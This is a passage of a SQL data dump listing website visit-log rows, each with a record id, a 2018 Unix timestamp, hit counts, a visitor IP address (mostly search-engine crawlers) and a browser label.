49.66.157',''),(265108,1530406296,1,0,1,0,'66.249.66.156',''),(265109,1530406355,1,1,0,0,'54.36.148.141','other'),(265110,1530406384,1,1,0,0,'54.36.149.9','other'),(265111,1530406462,1,1,0,0,'54.36.148.199','other'),(265112,1530406548,1,1,0,0,'54.36.148.204','other'),(265113,1530406717,3,3,0,0,'141.8.142.74','other'),(265114,1530406750,1,1,0,0,'87.250.224.46','other'),(265115,1530406861,2,2,0,0,'178.154.171.88','other'),(265116,1530406924,1,1,0,0,'54.36.148.251','other'),(265117,1530406968,1,1,0,0,'54.36.149.68','other'),(265118,1530407091,1,1,0,0,'54.36.148.86','other'),(265119,1530407098,1,1,0,0,'54.36.148.210','other'),(265120,1530407518,1,1,0,0,'54.36.148.70','other'),(265121,1530407651,1,1,0,0,'54.36.148.155','other'),(265122,1530407830,2,2,0,0,'54.36.148.194','other'),(265123,1530408013,1,1,0,0,'54.36.148.211','other'),(265124,1530408111,1,1,0,0,'54.36.148.171','other'),(265125,1530408393,1,0,1,0,'66.249.66.157',''),(265126,1530408475,1,1,0,0,'54.36.148.151','other'),(265127,1530408482,1,1,0,0,'54.36.148.213','other'),(265128,1530408662,1,1,0,0,'141.8.142.74','other'),(265129,1530408898,1,1,0,0,'54.36.148.177','other'),(265130,1530408917,2,2,0,0,'216.244.66.241','other'),(265131,1530409068,1,1,0,0,'54.36.148.246','other'),(265133,1530409083,1,1,0,0,'54.36.149.99','other'),(265134,1530409256,1,1,0,0,'54.36.148.142','other'),(265135,1530409422,1,1,0,0,'54.36.148.193','other'),(265136,1530409478,1,1,0,0,'54.36.148.80','other'),(265137,1530409484,1,1,0,0,'54.36.148.39','other'),(265138,1530409563,1,1,0,0,'54.36.148.171','other'),(265139,1530409631,1,0,1,0,'66.249.66.157',''),(265140,1530409696,2,0,2,0,'66.249.66.156',''),(265141,1530409714,3,3,0,0,'178.154.171.88','other'),(265142,1530409821,1,1,0,0,'54.36.149.35','other'),(265143,1530409952,1,1,0,0,'54.36.148.45','other'),(265144,1530409972,1,1,0,0,'54.36.149.79','other'),(265145,1530410319,1,1,0,0,'141.8.142.74','other'),(265146,1530410328,1,1,0,0,'54.36.148.242','other'),(265147,1530410465,1,1,0,0,'54.36.149.27','other'),(265148,1530410739,1,1,0,0,'54.36.148.146','other'),(265149,1530410855,1,1,0,0,'216.244.66.241','other'),(265150,1530411009,1,1,0,0,'54.36.148.11','other'),(265151,1530411068,1,1,0,0,'66.249.66.59','chrome'),(265152,1530411175,1,1,0,0,'95.163.255.97','other'),(265153,1530411177,1,1,0,0,'95.163.255.95','other'),(265154,1530411206,1,1,0,0,'66.249.66.155','chrome'),(265155,1530411209,1,1,0,0,'54.36.148.202','other'),(265156,1530411270,1,1,0,0,'54.36.148.203','other'),(265157,1530411333,1,1,0,0,'54.36.148.104','other'),(265158,1530411506,1,1,0,0,'54.36.148.122','other'),(265159,1530411562,1,1,0,0,'8.29.198.25','other'),(265160,1530411580,1,0,1,0,'66.249.66.157',''),(265161,1530411652,1,1,0,0,'54.36.148.177','other'),(265162,1530411660,1,1,0,0,'54.36.149.69','other'),(265163,1530411713,1,1,0,0,'54.36.149.16','other'),(265164,1530411829,1,1,0,0,'54.36.148.209','other'),(265165,1530411877,1,1,0,0,'141.8.142.74','other'),(265166,1530411947,1,1,0,0,'54.36.148.234','other'),(265167,1530412264,1,1,0,0,'54.36.148.160','other'),(265168,1530412330,1,1,0,0,'54.36.148.171','other'),(265169,1530412362,1,1,0,0,'54.36.148.166','other'),(265170,1530412385,1,1,0,0,'178.154.200.41','other'),(265171,1530412633,1,1,0,0,'54.36.148.109','other'),(265172,1530412680,1,0,1,0,'66.249.66.156',''),(265173,1530412812,1,1,0,0,'54.36.149.101','other'),(265174,1530412831,1,1,0,0,'54.36.148.198','other'),(265175,1530413015,2,2,0,0,'141.8.142.74','other'),(265176,1530413103,1,1,0,0,'54.36.148.246','other'),(265177,1530413259,1,1,0,0,'54.36.148.114','other'),(265178,1530413500,1,1,0,0,'54.36.148.248','other'),(265179,1530414093,1,1,0,0,'54.36.148.222','other'),(265180,1530414116,1,1,0,0,'54.36.148.140','other'),(265181,1530414148,1,1,0,0,'54.36.149.39','other'),(265182,1530414190,1,1,0,0,'66.249.66.155','chrome'),(265183,1530414191,1,1,0,0,'66.249.66.59','chrome'),(265184,1530414204,1,1,0,0,'141.8.142.74','other'),(265185,1530414264,1,1,0,0,'54.36.149.95','other'),(265186,1530414265,1,1,0,0,'54.36.148.117','other'),(265187,1530414292,1,1,0,0,'54.36.148.247','other'),(265188,1530414468,1,1,0,0,'35.239.135.210','other'),(265189,1530414621,1,1,0,0,'178.154.171.88','other'),(265190,1530415155,1,1,0,0,'54.36.148.182','other'),(265191,1530415187,1,1,0,0,'54.36.149.76','other'),(265192,1530415621,4,4,0,0,'141.8.142.74','other'),(265193,1530415747,1,1,0,0,'54.36.149.41','other'),(265194,1530415780,1,1,0,0,'8.29.198.26','other'),(265195,1530415796,1,1,0,0,'66.249.66.156','chrome'),(265196,1530415801,1,1,0,0,'54.36.148.198','other'),(265197,1530415925,1,1,0,0,'66.249.66.57','chrome'),(265198,1530416010,1,1,0,0,'54.36.148.165','other'),(265199,1530416255,1,1,0,0,'54.36.148.119','other'),(265200,1530416357,1,1,0,0,'54.36.148.185','other'),(265201,1530416359,1,1,0,0,'157.55.39.102','other'),(265202,1530416612,4,4,0,0,'216.244.66.241','other'),(265203,1530416666,2,2,0,0,'141.8.142.74','other'),(265204,1530416681,1,1,0,0,'54.36.149.78','other'),(265205,1530416904,1,1,0,0,'66.249.66.59','chrome'),(265206,1530417015,1,1,0,0,'54.36.149.56','other'),(265207,1530417133,1,1,0,0,'54.36.148.19','other'),(265208,1530417270,1,1,0,0,'54.36.148.77','other'),(265209,1530417378,1,1,0,0,'54.36.148.171','other'),(265210,1530417495,1,1,0,0,'178.154.171.88','other'),(265211,1530417507,2,2,0,0,'37.9.113.182','other'),(265212,1530417765,1,1,0,0,'54.36.148.217','other'),(265213,1530417775,1,1,0,0,'54.36.149.48','other'),(265214,1530417839,1,1,0,0,'54.36.149.24','other'),(265215,1530418441,1,1,0,0,'54.36.148.81','other'),(265216,1530418496,1,1,0,0,'66.249.66.57','chrome'),(265217,1530418577,2,2,0,0,'37.9.113.182','other'),(265218,1530418851,1,1,0,0,'54.36.148.195','other'),(265219,1530418857,4,4,0,0,'141.8.142.74','other'),(265220,1530419328,2,2,0,0,'178.92.85.85','chrome'),(265221,1530419373,1,1,0,0,'178.154.200.41','other'),(265222,1530419481,1,1,0,0,'54.36.148.110','other'),(265223,1530419505,1,1,0,0,'157.55.39.96','other'),(265224,1530419506,1,1,0,0,'85.10.207.195','other'),(265225,1530419653,1,1,0,0,'54.36.148.247','other'),(265226,1530419767,1,1,0,0,'54.36.148.61','other'),(265227,1530419896,1,1,0,0,'54.36.149.86','other'),(265228,1530420254,1,1,0,0,'54.36.148.162','other'),(265229,1530420513,1,1,0,0,'54.36.149.67','other'),(265230,1530420514,3,3,0,0,'5.9.144.234','other'),(265231,1530420675,1,1,0,0,'54.36.148.41','other'),(265232,1530420872,1,1,0,0,'54.36.148.45','other'),(265233,1530421104,1,1,0,0,'54.36.148.139','other'),(265234,1530421229,1,1,0,0,'54.36.148.255','other'),(265235,1530421315,1,1,0,0,'95.163.255.94','other'),(265236,1530421327,1,1,0,0,'54.36.149.62','other'),(265237,1530421341,1,1,0,0,'54.36.148.122','other'),(265238,1530421343,1,1,0,0,'54.36.149.16','other'),(265239,1530421369,1,1,0,0,'54.36.149.44','other'),(265240,1530421417,1,1,0,0,'54.36.148.24','other'),(265241,1530421696,1,1,0,0,'54.36.148.115','other'),(265242,1530421744,1,1,0,0,'54.36.148.19','other'),(265243,1530421817,1,1,0,0,'54.36.149.5','other'),(265244,1530421833,1,1,0,0,'54.36.148.130','other'),(265245,1530421894,1,1,0,0,'54.36.149.98','other'),(265246,1530421986,1,1,0,0,'54.36.148.133','other'),(265247,1530422060,1,1,0,0,'157.55.39.97','other'),(265248,1530422146,1,1,0,0,'54.36.148.231','other'),(265249,1530422399,1,1,0,0,'8.29.198.26','other'),(265250,1530422487,1,1,0,0,'54.36.148.139','other'),(265251,1530422561,1,1,0,0,'54.36.148.166','other'),(265252,1530422674,1,1,0,0,'54.36.148.191','other'),(265253,1530422738,1,1,0,0,'54.36.148.83','other'),(265254,1530422745,1,0,1,0,'66.249.66.59',''),(265255,1530422779,1,1,0,0,'157.55.39.96','other'),(265256,1530422813,1,1,0,0,'54.36.149.2','other'),(265257,1530422815,1,1,0,0,'178.154.171.88','other'),(265258,1530422819,1,1,0,0,'87.250.224.46','other'),(265259,1530422995,1,1,0,0,'54.36.149.61','other'),(265260,1530423054,1,1,0,0,'54.36.149.6','other'),(265261,1530423157,1,1,0,0,'54.36.149.28','other'),(265262,1530423227,1,1,0,0,'54.36.148.87','other'),(265263,1530423344,1,1,0,0,'54.36.148.71','other'),(265264,1530423793,1,1,0,0,'54.36.148.245','other'),(265265,1530424038,1,1,0,0,'54.36.149.101','other'),(265266,1530424156,1,1,0,0,'95.163.255.94','other'),(265267,1530424637,1,1,0,0,'54.36.149.33','other'),(265268,1530425089,1,1,0,0,'54.36.148.215','other'),(265269,1530425093,1,1,0,0,'54.36.148.31','other'),(265270,1530425166,1,1,0,0,'54.36.149.36','other'),(265271,1530425659,1,1,0,0,'216.244.66.241','other'),(265272,1530425772,1,1,0,0,'66.249.66.57','chrome'),(265273,1530426224,1,1,0,0,'54.36.148.29','other'),(265274,1530426308,1,1,0,0,'54.36.149.27','other'),(265275,1530426319,1,1,0,0,'54.36.148.134','other'),(265276,1530426440,1,1,0,0,'54.36.148.78','other'),(265277,1530426609,1,1,0,0,'54.36.149.18','other'),(265278,1530426615,1,1,0,0,'8.29.198.27','other'),(265279,1530426653,1,1,0,0,'54.36.148.154','other'),(265280,1530426736,2,2,0,0,'178.92.85.85','chrome'),(265281,1530426761,1,1,0,0,'66.249.66.57','chrome'),(265282,1530426783,1,1,0,0,'54.36.148.126','other'),(265283,1530426862,1,1,0,0,'54.36.148.40','other'),(265284,1530426871,1,1,0,0,'54.36.148.170','other'),(265285,1530427004,1,1,0,0,'54.36.148.213','other'),(265286,1530427189,1,1,0,0,'54.36.148.26','other'),(265287,1530427252,1,1,0,0,'54.36.148.237','other'),(265288,1530427383,1,1,0,0,'54.36.148.187','other'),(265289,1530427400,1,1,0,0,'54.36.148.21','other'),(265290,1530427453,1,1,0,0,'54.36.148.106','other'),(265291,1530427458,1,1,0,0,'54.36.148.238','other'),(265292,1530427488,1,1,0,0,'54.36.148.60','other'),(265293,1530427650,1,0,1,0,'66.249.66.155',''),(265294,1530427730,1,1,0,0,'199.58.86.209','other'),(265295,1530427878,1,1,0,0,'54.36.148.199','other'),(265296,1530427900,1,1,0,0,'54.36.148.94','other'),(265297,1530428095,1,0,1,0,'66.249.66.157',''),(265298,1530428237,1,1,0,0,'54.36.148.59','other'),(265299,1530428327,1,1,0,0,'54.36.148.88','other'),(265300,1530428727,1,1,0,0,'54.36.148.190','other'),(265301,1530428800,1,1,0,0,'54.36.148.246','other'),(265302,1530428813,1,1,0,0,'54.36.148.233','other'),(265303,1530428845,1,1,0,0,'54.36.149.87','other'),(265304,1530428993,1,1,0,0,'216.244.66.241','other'),(265305,1530429115,1,1,0,0,'54.36.149.30','other'),(265306,1530429329,1,1,0,0,'54.36.149.14','other'),(265307,1530429460,1,1,0,0,'54.36.149.57','other'),(265308,1530429497,1,1,0,0,'54.36.148.192','other'),(265309,1530429531,1,1,0,0,'54.36.148.212','other'),(265310,1530429669,1,0,1,0,'66.249.66.59',''),(265311,1530429688,1,1,0,0,'54.36.148.245','other'),(265312,1530429807,1,1,0,0,'54.36.148.239','other'),(265313,1530429965,1,1,0,0,'54.36.149.77','other'),(265314,1530430156,1,1,0,0,'54.36.149.49','other'),(265315,1530430305,1,0,1,0,'66.249.66.57',''),(265316,1530430315,1,1,0,0,'54.36.148.142','other'),(265317,1530430340,1,1,0,0,'54.36.148.27','other'),(265318,1530430449,1,1,0,0,'216.244.66.241','other'),(265319,1530430453,1,1,0,0,'173.249.24.45','firefox'),(265320,1530430461,1,1,0,0,'157.55.39.100','other'),(265321,1530431102,1,1,0,0,'54.36.148.189','other'),(265322,1530431140,1,1,0,0,'66.102.9.35','chrome'),(265323,1530431164,1,1,0,0,'54.36.148.98','other'),(265324,1530431218,1,1,0,0,'66.102.9.38','chrome'),(265325,1530431403,1,1,0,0,'54.36.148.164','other'),(265326,1530431427,1,1,0,0,'54.36.149.16','other'),(265327,1530431538,1,1,0,0,'54.36.148.26','other'),(265328,1530431547,1,1,0,0,'54.36.149.35','other'),(265329,1530431834,1,1,0,0,'66.249.66.59','chrome'),(265330,1530431922,2,2,0,0,'130.180.220.153','chrome'),(265331,1530432014,1,1,0,0,'54.36.148.67','other'),(265332,1530432018,1,1,0,0,'54.36.148.36','other'),(265333,1530432288,1,1,0,0,'54.36.148.82','other'),(265334,1530432370,1,1,0,0,'54.36.148.187','other'),(265335,1530432552,1,1,0,0,'54.36.149.65','other'),(265336,1530432580,1,1,0,0,'54.36.149.22','other'),(265337,1530432632,1,1,0,0,'54.36.148.211','other'),(265338,1530432714,1,1,0,0,'54.36.148.169','other'),(265339,1530432773,1,1,0,0,'54.36.148.80','other'),(265340,1530432817,1,1,0,0,'54.36.149.83','other'),(265341,1530433238,1,1,0,0,'8.29.198.25','other'),(265342,1530433287,1,1,0,0,'54.36.148.143','other'),(265343,1530433523,1,1,0,0,'54.36.149.101','other'),(265344,1530433584,1,0,1,0,'66.249.66.61',''),(265345,1530433612,2,2,0,0,'216.244.66.241','other'),(265346,1530434033,1,1,0,0,'54.36.149.22','other'),(265347,1530434142,1,1,0,0,'54.36.148.198','other'),(265348,1530434561,1,1,0,0,'54.36.148.42','other'),(265349,1530434629,1,1,0,0,'54.36.149.43','other'),(265350,1530434827,1,1,0,0,'54.36.148.26','other'),(265351,1530435117,1,1,0,0,'54.36.148.204','other'),(265352,1530435335,1,1,0,0,'54.36.148.89','other'),(265353,1530435436,1,1,0,0,'54.36.148.251','other'),(265354,1530435514,1,1,0,0,'54.36.149.104','other'),(265355,1530435518,1,1,0,0,'54.36.148.58','other'),(265356,1530435551,1,1,0,0,'54.36.148.105','other'),(265357,1530435759,1,1,0,0,'54.36.148.26','other'),(265358,1530435777,1,1,0,0,'54.36.149.65','other'),(265359,1530436063,1,1,0,0,'157.55.39.102','other'),(265360,1530436129,1,1,0,0,'66.249.66.57','chrome'),(265361,1530436394,1,1,0,0,'54.36.148.155','other'),(265362,1530436448,1,1,0,0,'54.36.148.94','other'),(265363,1530436465,1,1,0,0,'54.36.149.97','other'),(265364,1530436848,1,1,0,0,'54.36.149.22','other'),(265365,1530436853,1,0,1,0,'66.249.66.61',''),(265366,1530437039,1,1,0,0,'35.239.135.210','other'),(265367,1530437053,1,1,0,0,'54.36.148.31','other'),(265368,1530437091,1,1,0,0,'54.36.148.178','other'),(265369,1530437196,77,77,0,0,'157.55.39.102','other'),(265370,1530437226,94,94,0,0,'157.55.39.100','other'),(265371,1530437256,87,87,0,0,'157.55.39.96','other'),(265372,1530437342,1,1,0,0,'54.36.148.33','other'),(265373,1530437344,1,1,0,0,'54.36.148.177','other'),(265374,1530437412,1,1,0,0,'54.36.148.20','other'),(265375,1530437418,1,1,0,0,'54.36.149.90','other'),(265376,1530437441,1,1,0,0,'8.29.198.27','other'),(265377,1530437459,1,1,0,0,'54.36.148.152','other'),(265378,1530437479,79,79,0,0,'157.55.39.97','other'),(265379,1530437601,1,1,0,0,'54.36.148.28','other'),(265380,1530437646,1,1,0,0,'54.36.149.10','other'),(265381,1530437681,1,1,0,0,'54.36.148.60','other'),(265382,1530437831,1,1,0,0,'54.36.148.130','other'),(265383,1530438114,1,1,0,0,'54.36.148.69','other'),(265384,1530438316,1,1,0,0,'54.36.148.37','other'),(265385,1530438337,1,1,0,0,'54.36.148.80','other'),(265386,1530438382,1,1,0,0,'54.36.149.30','other'),(265387,1530438423,1,1,0,0,'54.36.148.78','other'),(265388,1530438482,1,1,0,0,'54.36.148.152','other'),(265389,1530439092,1,1,0,0,'66.249.66.57','chrome'),(265390,1530439234,1,1,0,0,'37.55.235.81','chrome'),(265391,1530439927,1,1,0,0,'54.36.148.161','other'),(265392,1530440366,1,1,0,0,'54.36.148.44','other'),(265393,1530440368,1,1,0,0,'54.36.149.83','other'),(265394,1530440396,1,1,0,0,'54.36.149.33','other'),(265395,1530440729,1,1,0,0,'216.244.66.241','other'),(265396,1530440740,1,1,0,0,'173.212.233.72','other'),(265397,1530440741,1,1,0,0,'173.212.233.72','msie'),(265398,1530440761,1,1,0,0,'54.36.148.173','other'),(265399,1530440864,1,1,0,0,'54.36.148.116','other'),(265400,1530440906,1,1,0,0,'54.36.149.98','other'),(265401,1530440993,1,1,0,0,'54.36.148.244','other'),(265402,1530441024,1,1,0,0,'54.36.148.205','other'),(265403,1530441378,1,1,0,0,'54.36.149.65','other'),(265404,1530441430,1,1,0,0,'54.36.149.76','other'),(265405,1530441482,1,0,1,0,'66.249.66.57',''),(265406,1530441514,1,1,0,0,'54.36.148.143','other'),(265407,1530441679,1,1,0,0,'54.36.149.80','other'),(265408,1530441794,1,1,0,0,'54.36.148.100','other'),(265409,1530441862,1,1,0,0,'54.36.149.28','other'),(265410,1530442166,1,1,0,0,'180.76.15.19','other'),(265411,1530442191,1,1,0,0,'54.36.148.179','other'),(265412,1530442473,1,1,0,0,'54.36.148.240','other'),(265413,1530442542,1,1,0,0,'54.36.149.72','other'),(265414,1530442555,1,1,0,0,'54.36.149.88','other'),(265415,1530442603,1,1,0,0,'54.36.149.60','other'),(265416,1530442684,1,1,0,0,'54.36.148.139','other'),(265417,1530442802,1,1,0,0,'54.36.148.95','other'),(265418,1530442938,1,1,0,0,'54.36.148.45','other'),(265419,1530442972,1,1,0,0,'54.36.148.181','other'),(265420,1530442978,1,1,0,0,'54.36.148.212','other'),(265421,1530443014,1,1,0,0,'54.36.149.92','other'),(265422,1530443178,1,1,0,0,'54.36.148.86','other'),(265423,1530443254,1,1,0,0,'54.36.149.4','other'),(265424,1530443673,1,1,0,0,'54.36.149.71','other'),(265425,1530444086,1,1,0,0,'54.36.149.21','other'),(265426,1530444089,1,1,0,0,'8.29.198.27','other'),(265427,1530444171,1,1,0,0,'91.196.178.35','chrome'),(265428,1530444172,1,1,0,0,'54.36.148.48','other'),(265429,1530444353,1,1,0,0,'54.36.148.87','other'),(265430,1530444376,1,1,0,0,'54.36.148.44','other'),(265431,1530444401,1,1,0,0,'54.36.149.58','other'),(265432,1530444609,1,1,0,0,'54.36.148.137','other'),(265433,1530444626,1,1,0,0,'54.36.148.51','other'),(265434,1530444892,1,1,0,0,'54.36.148.89','other'),(265435,1530444955,1,0,1,0,'66.249.66.155',''),(265436,1530444971,1,1,0,0,'95.163.255.94','other'),(265437,1530444996,2,1,1,0,'66.249.66.59',''),(265438,1530445002,1,1,0,0,'54.36.148.136','other'),(265439,1530445058,1,1,0,0,'54.36.149.77','other'),(265440,1530445277,1,1,0,0,'54.36.148.66','other'),(265441,1530445452,1,1,0,0,'54.36.148.182','other'),(265442,1530445456,1,1,0,0,'54.36.148.206','other'),(265443,1530445469,2,2,0,0,'157.55.39.102','other'),(265444,1530445475,1,1,0,0,'54.36.149.53','other'),(265445,1530445659,1,1,0,0,'54.36.148.104','other'),(265446,1530446055,1,1,0,0,'54.36.148.73','other'),(265447,1530446093,1,1,0,0,'54.36.148.216','other'),(265448,1530446144,1,1,0,0,'54.36.148.194','other'),(265449,1530446451,1,1,0,0,'54.36.148.75','other'),(265450,1530446454,1,1,0,0,'54.36.148.168','other'),(265451,1530446497,1,1,0,0,'54.36.149.20','other'),(265452,1530446782,1,1,0,0,'91.196.178.36','chrome'),(265453,1530446850,1,1,0,0,'54.36.148.101','other'),(265454,1530447042,1,1,0,0,'54.36.148.68','other'),(265455,1530447192,1,1,0,0,'35.239.135.210','other'),(265456,1530447314,1,1,0,0,'54.36.148.194','other'),(265457,1530447390,1,1,0,0,'54.36.148.94','other'),(265458,1530447512,1,1,0,0,'216.244.66.241','other'),(265459,1530447664,1,1,0,0,'180.76.15.148','other'),(265460,1530447678,1,1,0,0,'54.36.149.88','other'),(265461,1530447695,1,1,0,0,'54.36.148.223','other'),(265462,1530447716,1,1,0,0,'54.36.148.207','other'),(265463,1530447926,1,1,0,0,'54.36.148.246','other'),(265464,1530447946,1,1,0,0,'54.36.148.14','other'),(265465,1530448055,1,1,0,0,'54.36.149.2','other'),(265466,1530448057,1,1,0,0,'54.36.148.34','other'),(265467,1530448105,1,1,0,0,'54.36.149.13','other'),(265468,1530448268,1,1,0,0,'8.29.198.26','other'),(265469,1530449035,3,0,3,0,'66.249.66.157',''),(265470,1530449059,1,0,1,0,'66.249.66.61',''),(265471,1530449091,1,0,1,0,'66.249.66.155',''),(265472,1530449128,1,0,1,0,'66.249.66.59',''),(265473,1530449319,1,1,0,0,'157.55.39.97','other'),(265474,1530450557,1,1,0,0,'66.249.66.156','chrome'),(265475,1530451855,1,0,1,0,'66.249.66.61',''),(265476,1530451926,1,1,0,0,'95.163.255.97','other'),(265477,1530452024,4,0,4,0,'66.249.66.157',''),(265478,1530452129,1,1,0,0,'31.42.161.211','chrome'),(265479,1530452189,2,2,0,0,'216.244.66.241','other'),(265480,1530452666,1,0,1,0,'66.249.66.59',''),(265481,1530453654,5,0,5,0,'66.249.66.156',''),(265482,1530453765,4,0,4,0,'66.249.66.155',''),(265483,1530453925,2,0,2,0,'66.249.66.157',''),(265484,1530454256,1,1,0,0,'66.249.66.57','chrome'),(265485,1530454645,2,2,0,0,'91.196.178.180','chrome'),(265486,1530454655,1,0,1,0,'66.249.66.156',''),(265487,1530454922,1,1,0,0,'8.29.198.25','other'),(265488,1530454962,1,1,0,0,'157.55.39.97','other'),(265489,1530455255,1,1,0,0,'66.249.66.156','chrome'),(265490,1530455396,1,0,1,0,'66.249.66.155',''),(265491,1530456159,1,1,0,0,'66.249.66.57','chrome'),(265492,1530456705,4,0,4,0,'66.249.66.157',''),(265493,1530456789,1,0,1,0,'66.249.66.156',''),(265494,1530456795,3,1,2,0,'66.249.66.156',''),(265495,1530458601,3,0,3,0,'66.249.66.156',''),(265496,1530458704,1,0,1,0,'66.249.66.157',''),(265497,1530459099,1,1,0,0,'8.29.198.25','other'),(265498,1530459646,1,0,1,0,'66.249.66.59',''),(265499,1530459682,1,0,1,0,'66.249.66.156',''),(265500,1530460375,1,1,0,0,'128.72.177.9','msie'),(265501,1530460552,3,0,3,0,'66.249.66.155',''),(265502,1530460643,1,0,1,0,'66.249.66.157',''),(265503,1530460729,3,3,0,0,'216.244.66.241','other'),(265504,1530461446,1,1,0,0,'66.249.66.57','chrome'),(265505,1530461507,1,1,0,0,'54.36.149.74','other'),(265506,1530461840,1,0,1,0,'66.249.66.59',''),(265508,1530461868,1,1,0,0,'54.36.148.251','other'),(265509,1530462083,1,1,0,0,'54.36.148.85','other'),(265510,1530462273,1,1,0,0,'54.36.148.171','other'),(265511,1530462378,1,1,0,0,'54.36.148.246','other'),(265512,1530462439,1,1,0,0,'216.244.66.241','other'),(265513,1530462486,1,1,0,0,'54.36.148.185','other'),(265514,1530462625,2,0,2,0,'66.249.66.155',''),(265515,1530462636,1,1,0,0,'54.36.148.121','other'),(265516,1530462913,1,0,1,0,'66.249.66.157',''),(265517,1530463067,2,2,0,0,'212.90.60.207','chrome'),(265518,1530463109,1,1,0,0,'95.163.255.93','other'),(265519,1530463239,1,1,0,0,'54.36.149.41','other'),(265520,1530463288,1,1,0,0,'54.36.149.56','other'),(265521,1530463563,1,1,0,0,'54.36.149.88','other'),(265522,1530463592,1,1,0,0,'54.36.148.174','other'),(265523,1530463708,1,1,0,0,'54.36.148.149','other'),(265524,1530463740,1,1,0,0,'54.36.149.58','other'),(265525,1530463967,1,1,0,0,'54.36.148.243','other'),(265526,1530463989,1,1,0,0,'54.36.149.15','other'),(265527,1530464204,1,1,0,0,'54.36.148.19','other'),(265528,1530464293,1,1,0,0,'54.36.148.254','other'),(265529,1530464330,1,1,0,0,'54.36.149.105','other'),(265530,1530464709,2,2,0,0,'216.244.66.241','other'),(265531,1530465107,2,2,0,0,'157.55.39.102','other'),(265532,1530465416,1,1,0,0,'54.36.148.250','other'),(265533,1530465569,1,1,0,0,'54.36.149.98','other'),(265534,1530465757,1,1,0,0,'8.29.198.26','other'),(265535,1530465827,1,1,0,0,'54.36.148.72','other'),(265536,1530466014,1,1,0,0,'54.36.148.23','other'),(265537,1530466258,1,1,0,0,'54.36.149.29','other'),(265538,1530466327,1,0,1,0,'66.249.66.156',''),(265539,1530466338,1,1,0,0,'54.36.149.49','other'),(265540,1530466485,1,1,0,0,'54.36.148.185','other'),(265541,1530466748,1,1,0,0,'54.36.149.42','other'),(265542,1530466795,1,1,0,0,'216.244.66.241','other'),(265543,1530466937,1,1,0,0,'54.36.148.72','other'),(265544,1530466996,1,1,0,0,'66.249.66.59','chrome'),(265545,1530467179,1,0,1,0,'66.249.66.61',''),(265546,1530467252,1,1,0,0,'66.249.66.61','chrome'),(265547,1530467376,1,0,1,0,'66.249.66.156',''),(265548,1530467459,1,1,0,0,'95.163.255.97','other'),(265549,1530467535,1,1,0,0,'54.36.148.240','other'),(265550,1530467805,1,0,1,0,'66.249.66.157',''),(265551,1530467921,2,0,2,0,'66.249.66.155',''),(265552,1530468065,1,1,0,0,'54.36.149.102','other'),(265553,1530468159,1,1,0,0,'54.36.149.52','other'),(265554,1530468251,1,1,0,0,'54.36.148.243','other'),(265555,1530468351,1,1,0,0,'54.36.148.166','other'),(265556,1530468651,1,1,0,0,'54.36.149.98','other'),(265557,1530468677,1,1,0,0,'216.244.66.241','other'),(265558,1530468679,1,1,0,0,'95.163.255.99','other'),(265559,1530469151,1,1,0,0,'54.36.148.216','other'),(265560,1530469257,1,1,0,0,'54.36.149.63','other'),(265561,1530469391,1,0,1,0,'66.249.66.61',''),(265562,1530469638,3,0,3,0,'66.249.66.155',''),(265563,1530469919,1,1,0,0,'8.29.198.27','other'),(265564,1530470064,1,1,0,0,'54.36.148.66','other'),(265565,1530470128,1,0,1,0,'66.249.66.157',''),(265566,1530470237,1,1,0,0,'54.36.149.43','other'),(265567,1530470337,1,1,0,0,'91.196.178.79','firefox'),(265568,1530470515,1,1,0,0,'54.36.148.227','other'),(265569,1530470532,1,1,0,0,'54.36.149.96','other'),(265570,1530470604,1,1,0,0,'54.36.148.65','other'),(265571,1530470682,1,1,0,0,'87.250.224.46','other'),(265572,1530470907,1,1,0,0,'54.36.149.59','other'),(265573,1530470965,3,0,3,0,'66.249.66.155',''),(265574,1530470988,1,1,0,0,'54.36.149.49','other'),(265575,1530471542,1,0,1,0,'66.249.66.156',''),(265576,1530471647,1,1,0,0,'54.36.148.235','other'),(265577,1530471700,1,1,0,0,'216.244.66.241','other'),(265578,1530471843,1,1,0,0,'54.36.148.208','other'),(265579,1530472032,1,1,0,0,'54.36.148.211','other'),(265580,1530472306,1,1,0,0,'54.36.148.132','other'),(265581,1530472327,1,1,0,0,'66.249.66.61','chrome'),(265582,1530472671,1,1,0,0,'54.36.148.74','other'),(265583,1530473007,1,1,0,0,'178.154.171.88','other'),(265584,1530473041,1,1,0,0,'54.36.149.50','other'),(265585,1530473262,1,1,0,0,'54.36.148.147','other'),(265586,1530473275,1,0,1,0,'66.249.66.156',''),(265587,1530473315,1,1,0,0,'54.36.149.96','other'),(265588,1530473323,1,1,0,0,'54.36.148.196','other'),(265589,1530473357,1,1,0,0,'54.36.148.255','other'),(265590,1530473420,1,1,0,0,'54.36.149.16','other'),(265591,1530473493,1,1,0,0,'54.36.148.19','other'),(265592,1530473606,1,1,0,0,'54.36.148.41','other'),(265593,1530473627,1,1,0,0,'54.36.149.67','other'),(265594,1530473733,1,1,0,0,'54.36.148.50','other'),(265595,1530473770,1,1,0,0,'54.36.148.84','other'),(265596,1530473782,1,1,0,0,'54.36.148.33','other'),(265597,1530473783,2,2,0,0,'216.244.66.241','other'),(265598,1530473807,1,1,0,0,'54.36.149.58','other'),(265599,1530473918,1,1,0,0,'54.36.148.215','other'),(265600,1530473978,1,1,0,0,'54.36.148.121','other'),(265601,1530474017,1,1,0,0,'141.8.142.74','other'),(265602,1530474168,1,1,0,0,'180.76.15.6','other'),(265603,1530474232,1,1,0,0,'54.36.148.47','other'),(265604,1530474355,1,1,0,0,'54.36.148.122','other'),(265605,1530474619,1,1,0,0,'54.36.148.177','other'),(265606,1530474690,1,1,0,0,'35.239.135.210','other'),(265607,1530474698,1,1,0,0,'54.36.148.240','other'),(265608,1530474699,2,2,0,0,'54.36.148.107','other'),(265609,1530474912,1,1,0,0,'54.36.149.91','other'),(265610,1530474963,1,1,0,0,'54.36.149.22','other'),(265611,1530475017,1,1,0,0,'54.36.148.67','other'),(265612,1530475337,1,0,1,0,'66.249.66.155',''),(265613,1530475485,1,1,0,0,'54.36.148.208','other'),(265614,1530475492,1,0,1,0,'66.249.66.59',''),(265615,1530475659,2,1,1,0,'66.249.66.59',''),(265616,1530475709,1,1,0,0,'54.36.148.187','other'),(265617,1530476556,2,2,0,0,'141.8.142.74','other'),(265618,1530476597,2,2,0,0,'178.154.171.88','other'),(265619,1530476598,1,1,0,0,'8.29.198.25','other'),(265620,1530476688,1,1,0,0,'54.36.148.222','other'),(265621,1530476711,1,1,0,0,'54.36.148.128','other'),(265622,1530476917,1,1,0,0,'54.36.149.88','other'),(265623,1530477077,1,1,0,0,'54.36.148.151','other'),(265624,1530477274,1,1,0,0,'54.36.148.166','other'),(265625,1530477385,1,1,0,0,'66.249.66.59','chrome'),(265626,1530477421,1